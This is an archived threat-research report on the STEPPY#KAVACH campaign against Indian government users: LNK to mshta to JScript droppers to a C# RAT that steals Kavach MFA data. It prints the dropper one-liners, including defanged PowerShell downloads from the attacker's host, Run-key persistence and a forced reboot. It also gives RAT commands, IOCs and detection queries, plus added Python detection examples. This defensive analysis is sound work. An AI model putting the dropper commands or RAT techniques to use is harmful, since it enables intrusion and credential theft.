{
	"id": "602d466c-f72a-4f3c-91fa-c863967b62d2",
	"created_at": "2026-04-06T00:14:21.543562Z",
	"updated_at": "2026-04-10T03:36:50.408806Z",
	"deleted_at": null,
	"sha1_hash": "e0a0370a366efe41ef66ebed9b8885ece203bbd7",
	"title": "New STEPPY#KAVACH Attack Campaign Likely Targeting Indian Government: Technical Insights and Detection Using Securonix",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8193323,
	"plain_text": "New STEPPY#KAVACH Attack Campaign Likely Targeting Indian\r\nGovernment: Technical Insights and Detection Using Securonix\r\nArchived: 2026-04-05 17:36:34 UTC\r\nBy Securonix Threat Labs, Threat Research: D.Iuzvyk, T.Peck, O.Kolesnikov\r\nIntroduction\r\nThe Securonix Threat Research team has recently identified a new malicious attack campaign related to a malicious threat\r\nactor (MTA) tracked by Securonix as STEPPY#KAVACH targeting victims likely associated with the Indian government.\r\nThe new malicious campaign from STEPPY#KAVACH we observed over the past few weeks appears to share many\r\ncommon TTPs with the SideCopy/APT36 threat actors that were extremely active in 2021 and were previously attributed to\r\nPakistan by some researchers.\r\nThe STEPPY#KAVACH attack campaign we observed most recently involved an infection chain starting with a targeted\r\nphishing campaign. .LNK files are used to initiate code execution which eventually downloads and runs a malicious C#\r\npayload, which functions as a remote access trojan (RAT).\r\nAttribution\r\nPrimary target: As mentioned, there appear to be similarities between this latest STEPPY#KAVACH attack campaign we\r\nobserved and prior campaigns launched by APT36/SideCopy/TransparentTribe et al. As with the past campaigns reported,\r\nIndian government employees appear to be the primary target in this new campaign as well.\r\nPayload delivery: The delivery method, which we will cover later in depth, involved phishing emails which would lure the\r\nuser into opening a shortcut file (.LNK) to execute a remote .HTA payload using mshta.exe.\r\nExecutable file: The RAT or executable file delivered by the initial infection stage is extremely similar to payloads\r\ndelivered in the past by SideCopy. First, the payload is coded in the C# programming language. When looking at the\r\ndecompiled source code, many of the same functions are present, though renamed. 
Additionally, the use of Triple-DES in ECB mode to encrypt C2 communications has also been seen in previous versions.\r\nEach of the nine samples we analyzed also contains a very similar reference to a .pdb file, seen in the table below. Several samples share a file name and even a .pdb path but are distinct binaries; their hashes are listed individually at the end of the article.\r\nRAT file name Reference\r\nmakhandood.exe G:\\VP-S-Fin\\MGLS-28112022-ALL\\cl-only-deployed\\Client\\obj\\Debug\\makhandood.pdb\r\nsolaris1.exe G:\\VP-S-Fin\\Margulas\\Client\\obj\\Debug\\solaris1.pdb\r\nsolaris.exe G:\\VP-S-Fin\\memory\\encrypt-decrypt-byte-encrypted\\encrypt-decrypt\\obj\\Debug\\solaris.pdb\r\nsolaris1.exe G:\\VP-S-Fin\\Margulas\\Client\\obj\\Debug\\solaris1.pdb\r\nsolaris.exe G:\\VP-S-Fin\\memory\\encrypt-decrypt-byte-encrypted\\encrypt-decrypt\\obj\\Debug\\solaris.pdb\r\nsolaris.exe G:\\VP-S-Fin\\memory\\encrypt-decrypt-byte-encrypted\\encrypt-decrypt\\obj\\Debug\\solaris.pdb\r\nsigma.exe G:\\VP-S-Fin\\Margulas\\cl-only\\Client\\obj\\Debug\\sigma.pdb\r\nsystem.exe G:\\VP-S-Fin\\remote – N\\ConsoleApplication1\\ConsoleApplication1\\obj\\Debug\\system.pdb\r\nimeg.exe G:\\VP-S-Fin\\MGLS-Client-Oct2021-fordns\\Margulas-20may2021-pharla\\cl-only\\Client\\obj\\Debug\\imeg.pdb\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 1 of 13\r\nLure document: The file used to lure the user into opening it has historically contained a reference to a news article\r\nregarding India’s government. These range from reports, meeting information, address lists, or general PDF documents. In\r\nthis recent case, the lure is a .png file containing a year-old news article.\r\nC2 Hosting provider: Each of the IP addresses discovered in the executable files appeared to share one of several hosting\r\nproviders originating from Germany.\r\nIt’s interesting to see the evolution of the RAT payload over time. While C# has been the de facto programming language for\r\nRATs leveraged by this group, code changes and improvements are common. 
For instance, this latest version, which we’ll\r\ndive into later in the binary analysis section, allows the attacker to execute a .vbs script hosted on the attacker’s side; this is\r\nin addition to the .exe file execution we typically see.\r\nAdditionally, the methods inside the C# code used to execute the .exe file have changed. The code no longer calls cmd.exe\r\nlike we saw in the past; rather it leverages the C# Process.Start method. These are just a few of many examples we saw\r\nwhile analyzing various payloads over the last year.\r\nAttack overview and targets\r\nThe entire attack chain is quite robust. Most of the execution stems from script execution using JavaScript embedded in the .hta file and JScript files to\r\nexecute system commands on the target host.\r\nLike with many attacks we see today, the initial infection begins with a phishing email containing a compressed file\r\nattachment (11222022.zip). When opened by the user, the archive contains a single shortcut file designed to trick the user into\r\nopening it.\r\nThe attack chain in its entirety can be referenced in the diagram below. We’ll break down each element of the attack chain\r\ninto individual sections later on.\r\nFigure 1: Sample STEPPY#KAVACH attack chain\r\nInitial infection: shortcut to code execution\r\nThreat actors are no strangers to leveraging shortcut files (.LNK) to execute code. This offers a huge amount of flexibility as\r\nthe shortcut can call any process on the target system along with any command line parameters. Typically we see cmd.exe,\r\nregsvr32.exe or rundll32.exe being called; however in this case, we observed the shortcut calling the mshta.exe process\r\nwith a remote .hta file as its argument.\r\nFigure 2: Scanimg.png shortcut properties\r\nInspecting the shortcut file, we can see that it is calling the mshta.exe process. This process is designed to execute HTML\r\napplication (.hta) files. 
mshta.exe is listed by the LOLBAS project as a living-off-the-land binary, as an\r\nattacker can use it to execute either a local or remote .hta file with embedded malicious JavaScript code.\r\nThe complete command would run and execute the following:\r\nmshta.exe hxxps://www.incometaxdelhi[.]org/gallery/thumnails/mix/\r\nWhich redirects to:\r\nhxxps://www.incometaxdelhi[.]org/gallery/thumnails/mix/sit.hta\r\nBy looking at the URL, the .hta file was discovered being hosted on a likely compromised website, nested inside an obscure\r\n“gallery” directory designed to store some of the site’s images.\r\nThe purpose of the shortcut file is to appear simply as “Scanimg.png” to the user, thus luring them into thinking that they are\r\nopening a harmless image file. By default Windows operating systems hide the .LNK extension on shortcut files, even when other file extensions are shown. As\r\nwe’ll see later on, an image will eventually be presented to the user.\r\nInitial infection: stager attack chain\r\nNext, let’s dive into the sit.hta file that was executed using the shortcut file by mshta.exe. As expected, sit.hta contains\r\nembedded, partially obfuscated JavaScript code along with some rather unusual variable names.\r\nFigure 3: JavaScript contained in sit.hta\r\nStager operation: sit.hta\r\nTo hide from the user, the script first resizes its window to (0,0), meaning zero pixels by zero pixels. It then checks that .NET\r\nFramework v4.0.30319 is installed.\r\nAt this point it checks for the presence of the decoy .png file (8292.png). If the file does not exist, it proceeds with its\r\noperations. 
If the file already exists, meaning the system was previously compromised, it simply opens the png file for the\r\nuser and exits normally.\r\nCircling back to the first IF statement, there are six operations the script proceeds to execute, each in its own JScript file (kohlw.js appears twice in the table, written with two different sleep values). Several of the one-liners below are truncated as printed.\r\nAction Contents\r\nCreateTextFile: C:/ProgramData/kohl.js\r\nvar shell = new ActiveXObject(‘WScript.Shell’);var exec = shell.run(‘cmd.exe /c powershell.exe /c Invoke-WebRequest -O C:\\\\\\\\ProgramData\\\\\\\\8292.png hxxps://www.incometaxdelhi[.]org/gallery/thumnails/mix/b.php’,0,true);\r\nCreateTextFile: C:/ProgramData/kohlw.js\r\n“var shell = new ActiveXObject(‘WScript.Shell’);WScript.Sleep(35000);var exec = shell.run(‘cmd.exe /c start C:\\\\\\\\Progra\r\nCreateTextFile: C:/ProgramData/kohld.js\r\n“var shell = new ActiveXObject(‘WScript.Shell’);WScript.Sleep(100);var exec = shell.run(‘cmd.exe /c mkdir C:\\\\\\\\Program\r\nCreateTextFile: C:/ProgramData/update.js\r\n“var shell = new ActiveXObject(‘WScript.Shell’);WScript.Sleep(69000);var exec = shell.run(‘C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe /c Invoke-WebRequest -OutFile C:\\\r\nhxxp://155.133.23[.]244/d.php’,0,true);”\r\nCreateTextFile: C:/ProgramData/parhai.js\r\n‘var oWSS = new ActiveXObject(“WScript.Shell”);WScript.Sleep(15000);oWSS.RegWrite(“HKCU\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Window\r\n“C:\\\\\\\\ProgramData\\\\\\\\dvixm\\\\\\\\dvimo.exe”,”REG_SZ”);’\r\nCreateTextFile: C:/ProgramData/r.js\r\n“var shell = new ActiveXObject(‘WScript.Shell’);WScript.Sleep(200000);var exec = shell.run(‘cmd.exe /k shutdown /r /f\r\nCreateTextFile: C:/ProgramData/kohlw.js\r\n“var shell = new ActiveXObject(‘WScript.Shell’);WScript.Sleep(9000);var exec = shell.run(‘cmd.exe /c start C:\\\\\\\\Program\r\nLure file: 8292.png\r\nThe purpose of 8292.png is purely to act as 
a successful result of the user clicking the Scanimg.png(.lnk) file which acts as a\r\nlure for code execution. The image below shows the contents of the png file which appears to be a snippet or copy of a news\r\narticle posted on December 1st, 2021, by PIB Delhi, Ministry of Defence. It is interesting that the attackers opted to use a\r\nnews article that was out of date by exactly one year at the time of this particular campaign. This could have been a mistake by the\r\ngroup.\r\nFigure 4: Contents of 8292.png (lure file)\r\nMoving on, each of the .js (JScript) files created by sit.hta serves a single purpose. JScript files\r\nhave been linked to SideCopy operations in the past, though they have been less common.\r\nJScript file: kohl.js\r\nThis script simply downloads the 8292.png lure file using a PowerShell Invoke-WebRequest. This file is downloaded from\r\nhxxps://www.incometaxdelhi[.]org/gallery/thumnails/mix/b.php and is saved to C:\\ProgramData\\8292.png\r\nJScript file: kohlw.js\r\nThis script takes the downloaded lure file (8292.png) and opens it after sleeping, or pausing execution, for 35 seconds.\r\nPerhaps this long pause is to allow enough time for the download script to complete execution.\r\nJScript file: kohld.js\r\nAfter sleeping for only 1/10th of a second, this script simply creates the following directory inside the root of ProgramData:\r\nC:\\ProgramData\\dvixm\r\nJScript file: update.js\r\nWaiting a bit longer, the script sleeps for 69 seconds and then attempts to reach out via PowerShell to\r\nhxxp://155.133.23[.]244/d.php to download a binary file. The file is saved to C:\\ProgramData\\ as mm1.exe. 
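The six JScript droppers lend themselves to automated triage, because each one is a single line with an optional WScript.Sleep delay followed by either a shell.run command or a RegWrite call. The Python below is an added example written for this edit, not code from the report or from the threat actor. It parses constructed samples modelled on the droppers listed in the table above (quoting normalised to single quotes, paths written with forward slashes, the two truncated commands completed from the report’s own description of kohlw.js and kohld.js, the second kohlw.js variant omitted), orders them by their sleep delay, pulls out URLs and written files, and flags any Run-key target that no dropper actually writes to disk, which surfaces the dvimo.exe versus mm1.exe mismatch mechanically.

```python
import re
from pathlib import PureWindowsPath

# Constructed samples modelled on the JScript droppers that sit.hta writes to
# ProgramData. Quoting is normalised to single quotes, paths use forward
# slashes (the real one-liners use backslashes), the truncated kohlw.js and
# kohld.js commands are completed from the report's description of them, the
# second kohlw.js variant is omitted, and the URLs are the report's defanged forms.
DROPPERS = {
    'kohl.js': r'''var shell = new ActiveXObject('WScript.Shell');var exec = shell.run('cmd.exe /c powershell.exe /c Invoke-WebRequest -O C:/ProgramData/8292.png hxxps://www.incometaxdelhi[.]org/gallery/thumnails/mix/b.php',0,true);''',
    'kohlw.js': r'''var shell = new ActiveXObject('WScript.Shell');WScript.Sleep(35000);var exec = shell.run('cmd.exe /c start C:/ProgramData/8292.png',0,true);''',
    'kohld.js': r'''var shell = new ActiveXObject('WScript.Shell');WScript.Sleep(100);var exec = shell.run('cmd.exe /c mkdir C:/ProgramData/dvixm',0,true);''',
    'update.js': r'''var shell = new ActiveXObject('WScript.Shell');WScript.Sleep(69000);var exec = shell.run('C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe /c Invoke-WebRequest -OutFile C:/ProgramData/mm1.exe hxxp://155.133.23[.]244/d.php',0,true);''',
    'parhai.js': r'''var oWSS = new ActiveXObject('WScript.Shell');WScript.Sleep(15000);oWSS.RegWrite('HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run','C:/ProgramData/dvixm/dvimo.exe','REG_SZ');''',
    'r.js': r'''var shell = new ActiveXObject('WScript.Shell');WScript.Sleep(200000);var exec = shell.run('cmd.exe /k shutdown /r /f',0,true);''',
}

# One-line droppers: an optional Sleep, then either a shell.run(...) or a RegWrite(...).
SLEEP_RE = re.compile(r'WScript[.]Sleep[(]([0-9]+)[)]')
RUN_RE = re.compile(r'''[.]run[(]'([^']*)',''')
REG_RE = re.compile(r'''RegWrite[(]'([^']*)','([^']*)',''')
URL_RE = re.compile(r'''hxxps?://[^ ']+''')
# -O and -OutFile are the same Invoke-WebRequest switch.
OUTFILE_RE = re.compile(r'-O(?:utFile)? ([^ ]+)')


def parse_dropper(name, text):
    '''Describe what one dropper does once its sleep elapses.'''
    sleep = SLEEP_RE.search(text)
    event = {'script': name, 'delay_ms': int(sleep.group(1)) if sleep else 0,
             'kind': 'other', 'command': None, 'writes': [], 'urls': []}
    run = RUN_RE.search(text)
    if run:
        cmd = run.group(1)
        event['command'] = cmd
        event['urls'] = URL_RE.findall(cmd)
        out = OUTFILE_RE.search(cmd)
        if out:
            event['kind'] = 'download'
            event['writes'].append(out.group(1))
        elif 'shutdown' in cmd:
            event['kind'] = 'reboot'
        elif ' mkdir ' in cmd:
            event['kind'] = 'mkdir'
        elif ' start ' in cmd:
            event['kind'] = 'open'
    reg = REG_RE.search(text)
    if reg:
        event['kind'] = 'persistence'
        event['reg_key'], event['reg_value'] = reg.group(1), reg.group(2)
    return event


def timeline(droppers=DROPPERS):
    '''All dropper actions ordered by the delay each script sleeps before acting.'''
    return sorted((parse_dropper(n, t) for n, t in droppers.items()),
                  key=lambda e: e['delay_ms'])


def dangling_persistence(events):
    '''Run-key targets that no download in the chain ever writes to disk.'''
    written = {PureWindowsPath(p).name.lower() for e in events for p in e['writes']}
    return [e['reg_value'] for e in events
            if e['kind'] == 'persistence'
            and PureWindowsPath(e['reg_value']).name.lower() not in written]


def indicators(events):
    '''Network and file indicators pulled from the whole chain.'''
    return {'urls': sorted({u for e in events for u in e['urls']}),
            'files': sorted({p for e in events for p in e['writes']})}


if __name__ == '__main__':
    events = timeline()
    for e in events:
        print('%7d ms  %-10s %-12s %s' % (e['delay_ms'], e['script'], e['kind'],
                                          e['command'] or e['reg_value']))
    print('dangling persistence:', dangling_persistence(events))
    print('indicators:', indicators(events))
```

Running the module prints the delay-ordered timeline followed by the dangling Run-key target and the extracted indicators. The same functions can be pointed at dropper text recovered from a real ProgramData directory; PureWindowsPath accepts both path separators, but samples that use double quotes (as the real parhai.js does) would need the quote class in the patterns widened.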
We will dig into\r\nthis binary file further down.\r\nJScript file: parhai.js\r\nTo establish persistence, this script performs a registry edit using the RegWrite method after sleeping for 15 seconds.\r\nThis persistence method is well documented and is commonly used by malware to maintain a presence on the\r\ntarget host. When the user logs on, programs referenced by the Run key are executed.\r\nIn this case, the attackers modified the key “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” with the value\r\n“C:\\ProgramData\\dvixm\\dvimo.exe”.\r\nJScript file: r.js\r\nThis script simply reboots the target system after waiting 200 seconds. Once the user logs back in, the downloaded binary\r\nshould execute in theory, and keep executing each time the system reboots.\r\nTo wrap up, the main goal of the script is to execute the binary payload (mm1.exe) after rebooting the target system by\r\nhaving it execute as a startup process via the Run key. One interesting thing to note is a probable error in the\r\nscript: the path the binary is saved to (C:\\ProgramData\\mm1.exe) does not match the path the registry value references (C:\\ProgramData\\dvixm\\dvimo.exe), so as written mm1.exe\r\nwould never execute. This could be an error on the attacker’s part.\r\nBinary analysis: mm1.exe\r\nBased on its capabilities which we will dive into further down, the binary file would be classified as a RAT (remote access\r\ntrojan). 
At a high level it allows for C2 command execution, additional payload download and execution, desktop\r\nscreenshots, and file exfiltration.\r\nThe downloaded binary payload mm1.exe is a standard PE32 Windows executable standing at only 18 KB, with a PE compile timestamp (which attackers can forge) of\r\nDecember 2, 2022.\r\nThe original file name is listed as makhandood.exe with a file version of 5.58.2.9.\r\nFigure 5: mm1.exe PE data\r\nAfter decompiling the binary, the main function appears to be rather interesting. We’ll start by examining this function and\r\nbranching our way out as other functions are called.\r\nFigure 6: mm1.exe Main() function\r\nAt the start of the function there are a few strings being defined into “str”, “text”, “text2”, “text3”, and “text4”. The first four,\r\nwhen later combined in “text4”, contain the text “kavach” and “kavach.db”. The string “text4” references the user’s\r\nAppData/Roaming folder. Putting all the pieces together we get the full path and filename referenced by the malware:\r\nC:\\Users\\username\\AppData\\Roaming\\kavachdb\\kavach.db\r\nSo what is this file? Kavach (Hindi for “armor”) is an authentication system used by the Government of India (GoI) NIC\r\nagency. Kavach provides its users with an MFA application/client used for the authentication of employee credentials. The\r\ninclusion of this particular file in the function gives us an indication that this is a very targeted attack. It’s possible that the\r\nattackers had some inside knowledge of their target’s systems or infrastructure.\r\nNote – the idea of bypassing Kavach capabilities is not new and was previously implemented by the earlier attacks involving\r\ne.g. SideCopy. 
Specifically, the activity from SideCopy targeting Kavach MFA was reported back in March of this year, and\r\nit would appear that this tactic remains the same today as of the end of 2022, though in the past the application itself was the\r\nlure as it posed as a Kavach installer or updater.\r\nNext, the malware calls two functions using the ThreadStart delegate. These functions are “prparingsiej” and “kutkutktak”\r\ninside the “lkar” class. This class is primarily responsible for establishing and maintaining C2 related tasks.\r\nCircling back to main, if the malware detects the presence of the kavach.db file, it attempts to initiate a connection to the C2\r\nserver and send a message back to the C2 server via the “prparingsiej” function as seen in the figure below.\r\nFigure 7: prparingsiej() function\r\nPivoting further, we can see that the function prparingsiej() is parsing data from the tng() class. This class contains a single\r\nIP address (155.133.23[.]244) and three ports (3309, 3310, 3311) that are used by the previous function to establish the connection and\r\nexfiltrate the kavach.db file. The IP address hard coded into the binary file is the same one used to download the file in the\r\noriginal JScript code. It would appear that the port is chosen at random by the calling functions.\r\nFigure 8: tng class\r\nAnother interesting capability of the malware is to accept and execute commands from the attacker. The Read() method is used\r\nonce the connection has been established. The C2 communications are encrypted using Triple-DES in ECB mode, which\r\nhides the command traffic from signature-based network IDS/IPS inspection. As seen in the figure above, the hardcoded encryption key is “function_load”. Note that a 13-character string is not a valid Triple-DES key on its own (key material is 16 or 24 bytes), so the binary must derive the working key from it before use; either way, a static key embedded in the sample means the C2 traffic of any infected host can be decrypted once the binary has been analyzed.\r\nThe method has the capability to accept five interestingly named commands which execute different functions. 
Let’s take a\r\nlook at each.\r\nFigure 9: Read() method\r\nThe table below is a breakdown of each of the commands and a brief overview of the commands’ capabilities.\r\nCommand Action\r\niwantmore Calls the Socket.Shutdown(SocketShutdown) method, which disables send/receive on the open socket and closes the RAT. (This is interesting as no files are cleaned up; a reboot may reconnect to the C2 server.)\r\nrabiapleasemujaychordo Accepts Name and Data parameters which specify a binary file name and Base64 encoded contents. Writes the binary file to AppData\\(Random GUID)\\binary_name.exe and executes it.\r\ngoingdwn Accepts Name and Data parameters which specify a .vbs (Visual Basic script) name and Base64 encoded contents. Writes the .vbs file to AppData\\(Random GUID)\\script_name.vbs and executes it.\r\ndorjahun A simple connectivity check.\r\ngurdaykapuray Takes a screenshot of the user’s desktop and sends it back to the C2 server. It accepts a few parameters such as the width and height of the screenshot.\r\nDespite the small binary file size, the malware contains quite a robust feature set. Much of this stems from the fact that the\r\nmalware authors made almost no attempt to obfuscate the binary as it was a simple .NET generated executable.\r\nTo handle multiple compromised hosts the malware generates a unique ID of the target using the ID() function. It is then\r\nreferenced throughout other areas of the application when communication is established. 
The unique ID is generated using\r\nthe target’s Domain Name, User Name, and Machine Name as seen in the figure below.\r\nUpon successful connection, data about the target is sent back to the C2 server with some strange appended strings such as\r\n“feeldizzy” and “RATI-KAM”, though the string “RATI-KAM” is later replaced by the variable OsFullName, which is\r\nadmittedly strange.\r\nFigure 10: ID() and tinting() functions\r\nOne particularly interesting function that is never called is bndkrknwakro(). This appears to\r\nperform the same task as the function referenced by the “rabiapleasemujaychordo” command, which downloads a binary .exe\r\nfile and executes it on the host, with the exception of deleting the file afterward.\r\nThis appears to be leftover code from a previous version of the binary used by the same group earlier in the year. This was\r\nimproved upon by a much more streamlined function that does not call cmd.exe, but rather uses native C# methods to\r\nexecute a process.\r\nFigure 11: bndkrknwakro() function\r\nOther binary files containing very similar code were also discovered being leveraged by the same group. This year alone we\r\nwere able to find nine unique samples used by the threat actors. The primary function of each of the .exe files\r\nwas to act as a RAT. In this particular case, mm1.exe also functions as a RAT with the added functionality of looking for the\r\nMFA db file, kavach.db, on carefully selected targets. 
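Before moving on to the infrastructure, it is worth making the endpoint behaviour described above concrete as detection logic: mshta.exe spawning a script interpreter, the staging files landing in C:\\ProgramData, a Run value pointing into ProgramData, and mshta.exe talking to a non-private address. The Python below is an added example written for this edit, not Securonix content. It evaluates constructed Sysmon-style events (IDs 1, 3, 11 and 13; path separators normalised to forward slashes; 203.0.113.7, a documentation address, standing in for a public destination) against those four behaviours plus the report’s C2 address, and also shows why the private-range exclusion has to be a conjunction rather than a chain of OR-ed inequalities.

```python
import ipaddress
from pathlib import PureWindowsPath

# Internal ranges a network-connection rule should exclude. A destination is
# external only if it lies outside every one of them.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    '10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16', '127.0.0.0/8', '169.254.0.0/16')]
# Children worth flagging under mshta.exe.
INTERPRETERS = {'powershell.exe', 'cscript.exe', 'wscript.exe',
                'msiexec.exe', 'rundll32.exe', 'msbuild.exe'}
# File names the stager drops into ProgramData, and the report's C2 address.
DROPPED_NAMES = {'8292.png', 'mm1.exe', 'kohl.js', 'kohlw.js', 'kohld.js',
                 'update.js', 'parhai.js', 'r.js'}
KNOWN_C2 = {'155.133.23.244'}


def is_external(ip_text):
    '''True when the address is outside all of the internal ranges.'''
    ip = ipaddress.ip_address(ip_text)
    return not any(ip in net for net in PRIVATE_NETS)


def naive_is_external(ip_text):
    '''The tempting but wrong form. An address can never equal every range at
    once, so OR-ing the inequalities together accepts everything, internal
    hosts included.'''
    return any(ip_text != str(net) for net in PRIVATE_NETS)


def check(ev):
    '''Return the names of the rules one Sysmon-style event trips.'''
    hits = []
    eid = ev['EventID']
    if eid == 1:   # process creation
        parent = PureWindowsPath(ev['ParentImage']).name.lower()
        child = PureWindowsPath(ev['Image']).name.lower()
        if parent == 'mshta.exe' and child in INTERPRETERS:
            hits.append('mshta_spawns_interpreter')
    elif eid == 3:   # network connection
        image = PureWindowsPath(ev['Image']).name.lower()
        if image == 'mshta.exe' and is_external(ev['DestinationIp']):
            hits.append('mshta_external_connection')
        if ev['DestinationIp'] in KNOWN_C2:
            hits.append('known_c2_address')
    elif eid == 11:   # file create
        path = PureWindowsPath(ev['TargetFilename'])
        if path.parent.name.lower() == 'programdata' and path.name.lower() in DROPPED_NAMES:
            hits.append('staging_file_in_programdata')
    elif eid == 13:   # registry value set
        key_parts = [p.lower() for p in PureWindowsPath(ev['TargetObject']).parts]
        value_parts = [p.lower() for p in PureWindowsPath(ev['Details']).parts]
        if 'currentversion' in key_parts and 'run' in key_parts and 'programdata' in value_parts:
            hits.append('run_key_points_into_programdata')
    return hits


def scan(events):
    '''(event id, rule) pairs for every event that trips a rule.'''
    return [(ev['id'], rule) for ev in events for rule in check(ev)]


# Constructed events shaped like Sysmon IDs 1, 3, 11 and 13, with separators
# normalised to forward slashes; PureWindowsPath accepts either form.
EVENTS = [
    {'id': 1, 'EventID': 1, 'ParentImage': 'C:/Windows/System32/mshta.exe',
     'Image': 'C:/Windows/System32/wscript.exe'},
    {'id': 2, 'EventID': 1, 'ParentImage': 'C:/Windows/System32/cmd.exe',
     'Image': 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe'},
    {'id': 3, 'EventID': 3, 'Image': 'C:/Windows/System32/mshta.exe', 'DestinationIp': '192.168.1.20'},
    {'id': 4, 'EventID': 3, 'Image': 'C:/Windows/System32/mshta.exe', 'DestinationIp': '203.0.113.7'},
    {'id': 5, 'EventID': 3, 'Image': 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
     'DestinationIp': '155.133.23.244'},
    {'id': 6, 'EventID': 11, 'TargetFilename': 'C:/ProgramData/kohl.js'},
    {'id': 7, 'EventID': 11, 'TargetFilename': 'C:/Users/analyst/Downloads/kohl.js'},
    {'id': 8, 'EventID': 13,
     'TargetObject': 'HKU/S-1-5-21-1111/Software/Microsoft/Windows/CurrentVersion/Run/dvimo',
     'Details': 'C:/ProgramData/dvixm/dvimo.exe'},
]

if __name__ == '__main__':
    for event_id, rule in scan(EVENTS):
        print(event_id, rule)
```

Events 2, 3 and 7 are deliberate negatives: powershell.exe launched by cmd.exe rather than mshta.exe, an mshta.exe connection to an internal host, and a kohl.js that lands somewhere other than ProgramData. The registry rule matches on path components rather than a fixed prefix, so it works for both HKCU and the HKU\\SID form Sysmon records.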
Additional binary file names and hashes are listed at the end of the\r\narticle.\r\nC2 and infrastructure\r\nBoth the .hta and .js files reference two different servers which the threat actors used to host payloads and launch their\r\nattacks.\r\nThe first website, which was used by the .LNK file to download and execute the JavaScript found in the .hta file, was hosted\r\ninside a /gallery/ directory on what appears to be a compromised website, www.incometaxdelhi[.]org.\r\nhxxps://www.incometaxdelhi[.]org/gallery/thumnails/\r\nIt is common practice for attackers to leverage compromised legitimate websites to stage payloads and host malicious files.\r\nThis allows the attacker to leverage the legitimate website’s already established reputation to get around blacklist or IP\r\nreputation filters. Oftentimes, as with this case, the website is using a valid TLS certificate to encrypt network\r\ncommunication between server and client, so the download is also opaque to proxies that do not inspect TLS.\r\nAt the time of writing this article, the attacker’s malicious files which were hosted in a /mix/ directory have since been\r\nremoved.\r\nNext, the generated update.js file attempts to download the mm1.exe payload from the IP address\r\n155.133.23[.]244 (the 8292.png lure comes from the compromised website), which is also the IP address hard coded as the C2 connection IP in the mm1.exe binary file. Interestingly\r\nenough, the IP address redirects to hxxps://email.gov[.]in when no files or directories are supplied. The IP address is hosted\r\nin Germany by the hosting provider Contabo.\r\nWe detected a similar IP address, 78.46.21[.]248, that also redirected to mail.gov[.]in. However, in this case it\r\nwas not directly involved in the attack, but shared some striking similarities.\r\nFigure 12: India Kavach NIC MFA app example\r\nConclusion\r\nOverall, it is clear that this is a very targeted attack towards the Indian government. 
We know that the binary file mm1.exe is\r\nlooking for a very particular database file (kavach.db) which means that the attacker had inside knowledge as to their\r\nintended target. Some of this knowledge includes its security controls, such as which MFA client was being used by\r\nemployees.\r\nThe lure image also references a news article from a .gov website in India and the compromised website used by the attacker\r\nto host the malicious HTA file was also located in India. Additionally, the fact that the attacker’s C2 server redirects to an\r\nIndian government-owned email site adds more proof as to the nature and target of the attack.\r\nBased on correlated data from the binary samples obtained of the RAT used by the threat actors, this campaign has been\r\ngoing on against Indian targets undetected for the last year. Based on indicators discovered by our team recently, we can\r\nconclude that the threat actors are still active and have no plans to stop operations.\r\nSecuronix recommendations and mitigations\r\nAvoid opening email attachments or clicking embedded links from untrusted sources\r\nMonitor the usage of mshta.exe, especially making external connections\r\nDeploy additional process-level logging such as Sysmon for additional log coverage\r\nScan endpoints using the Securonix seeder hunting queries below\r\nRelevant Spotter queries\r\n(rg_functionality=”Next Generation Firewall” OR rg_functionality=”Web Proxy”) AND requesturl CONTAINS\r\n“incometaxdelhi.org/gallery/thumnails/mix/”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction =\r\n“ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR\r\ndeviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace\r\nExecuted Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR\r\ndeviceaction = “Process Activity: 
Launched”) AND sourceprocessname = “mshta.exe” AND\r\n(destinationprocessname = “powershell.exe” OR destinationprocessname = “cscript.exe” OR destinationprocessname\r\n= “wscript.exe” OR destinationprocessname = “msiexec.exe” OR destinationprocessname = “rundll32.exe” OR\r\ndestinationprocessname = “msbuild.exe”)\r\n(rg_functionality=”Firewall” OR rg_functionality=”Next Generation Firewall” OR rg_functionality=”Web Proxy”)\r\nAND ipaddress IN (“155.133.23.244”,”62.171.187.53”,”149.248.52.61”)\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction ENDS WITH “Written” OR deviceaction =\r\n“File created”) AND (customstring49 ENDS WITH “\\ProgramData\\8292.png” OR filepath ENDS WITH\r\n“\\ProgramData\\mm1.exe” OR customstring49 ENDS WITH “\\ProgramData\\kohl.js” OR customstring49 ENDS\r\nWITH “\\ProgramData\\kohlw.js” OR customstring49 ENDS WITH “\\ProgramData\\kohld.js” OR customstring49\r\nENDS WITH “\\ProgramData\\update.js” OR customstring49 ENDS WITH “\\ProgramData\\parhai.js” OR\r\ncustomstring49 ENDS WITH “\\ProgramData\\r.js”)\r\nrg_functionality = “Endpoint Management Systems” AND deviceaction = “Network connection detected” AND\r\ndestinationprocessname = “mshta.exe” AND (destinationaddress != “10.0.0.0/8” AND destinationaddress !=\r\n“172.16.0.0/12” AND destinationaddress != “192.168.0.0/16” AND destinationaddress != “127.0.0.1” AND\r\ndestinationaddress != “127.0.0.0/8” AND destinationaddress != “169.254.0.0/16”)\r\nThe private-range exclusions in the last query must be combined with AND: a destination is external only if every inequality holds, and OR-ing them together would match every address, internal ones included.\r\nSome examples of relevant Securonix detection policies\r\nEDR-ALL-63-RU\r\nEDR-ALL-1001-RU\r\nEDR-ALL-79-ER\r\nEDR-ALL-185-ER\r\nEDR-ALL-1100-RU\r\nMITRE ATT\u0026CK\r\nTactic Technique\r\nInitial Access\r\nT1566: Phishing\r\nT1566.001: Phishing: Spearphishing Attachment\r\nExecution\r\nT1204.002: User Execution: Malicious 